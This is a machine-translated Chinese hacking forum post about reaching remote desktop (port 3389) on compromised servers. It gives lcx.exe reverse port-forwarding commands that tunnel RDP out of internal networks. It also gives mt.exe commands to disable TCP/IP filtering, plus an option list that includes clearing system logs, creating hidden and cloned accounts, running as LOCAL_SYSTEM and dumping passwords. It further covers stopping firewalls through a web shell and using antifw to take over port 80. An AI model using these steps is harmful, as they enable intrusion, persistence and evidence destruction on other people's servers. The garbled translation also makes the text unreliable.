3389开放后网络远程连接的分析与解决

点评：开盘后3389。有时远程连接没有启动。让我们来分析一下。

对于3389，连接不起来，有几个原因，我来总结一下，哇，这几天，几台服务器都有TM，分析，
原因1，远程桌面端口被更改。2，另一个服务器在内部网。3，防火墙截取。4，TCP/IP安全限制。
嗯，知道为什么，我们有一个思考的解决方案（参考的一部分）：
远程桌面端口已更改为解决方案：
现在一般的ASP马来西亚检测到服务器的功能，在良好的环境许可，可以直接查看远程端口（终端服务），或者你可以检查注册表可以远程桌面端口，ASP权限，在aspx查看注册表的aspx支持。
另一方服务器在内部网解决方案中：
在这种情况下，我们可以使用LCX做端口转发，不知道或不百度lcx.exe下载我不提供下载。
使用方法uff1a
1。lcx.exe上传到目标服务器可执行目录
2。本地主机启动lcx.exe监控、指挥：
lcx.exe听19884567 / /监听1988端口转发到端口4567
在目标主机上运行：
格式是：
lcx.exe -从您的IP监控端口肉机IP转发的目标主机端口
例如：lcx.exe奴隶192.168.86.1 1988 192.168.86.3 3389
三.本地链接：127.0.0.1:1988
好吧，有点麻烦，但还是很有效。如果您也是内部网，您将执行下一个端口映射，映射到被转发的端口，哇Kaka。
4、防火墙拦截解决方案：
一般来说，做端口转发，或者使用LCX，
使用方法uff1a
lcx.exe -从您的IP监控端口肉机向目标主机端口
例如：lcx.exe奴隶192.168.86.1 1988 192.168.86.3 3389
然后本地连接：127.0.0.1:1988做。
如果没有，如果Web是系统权限，直接停止防火墙服务是没有问题的。
5，TCP/IP安全策略限制。
这个解决方案是更多一点，你可以用mt.exe关闭政策，
使用方法uff1a
1。mt.exe上传到目标服务器可执行目录
2。执行命令：mt.exe过滤掉
这将关闭TCP/IP限制。
选项：
过滤mdash；开始改变状态的TCP / IP筛选器
-加入一个打印机端口mdash；端口添加到过滤器的允许列表
- setport mdash；设置端口的过滤器允许列表
- nicinfo mdash；列出TCP / IP接口信息
- NetWare打印服务器列表主机实用程序mdash；列表的活动过程
-角色mdash；杀毒指定过程
- dlllist mdash；列出指定进程的DLL
- sysinfo mdash；列表的系统信息
-关闭-关闭系统；
-重启mdash；重新启动系统
-关机mdash；关掉电源
-注销注销当前用户会话mdash；
- chkts mdash；检查终端服务信息
- setupts mdash；安装终端服务
- remts mdash；卸载终端服务
- chgtsp mdash；复位终端服务端口
木屐mdash；清除系统日志
- enumsrv mdash；列出所有服务
- querysrv mdash；列表中指定的服务细节
- instsrv mdash；安装服务
- cfgsrv mdash；改变服务配置
- remsrv mdash；卸载指定的服务
- startsrv mdash；启动指定的服务
- stopsrv mdash；停止指定服务
- netget mdash；从HTTP或FTP下载
-重定向mdash；端口重定向
-头mdash；列出所有帐户，Sid，和反克隆
克隆mdash；克隆管理的目标
不要mdash；设置一个帐户，从未出现在登录
- killuser mdash；删除账户，甚至guest也可以删除
苏mdash；与local_system权限运行过程
- findpass mdash；显示所有注册用户的密码
- netstat mdash；列出TCP连接
- killtcp mdash；杀了TCP连接
- pSPORT mdash；端口映射过程
触摸mdash；设置文件的日期和时间到指定的值
- secdel mdash；通过安全删除文件或目录所占用的空间
- regshell mdash；进入控制台注册表编辑器
- chkdll mdash；检测吉娜DLL后门
以上只是说一种好的使用方法，成功率往往很高，哇咔唑。
使用antifw.exe工具，
使用方法uff1a
下输入cmd
antifw -运行程序停止IIS 3389变成80
antifw L关闭程序恢复IIS。
当连接直接连接到他的80端口时，就可以了，内部网络被杀死了！成功率很高，但他不能访问这个网站。
好了，我们站起来分析原因，克服所有困难，排除限制，给他80个港口减速，哇卡卡…
按：西伊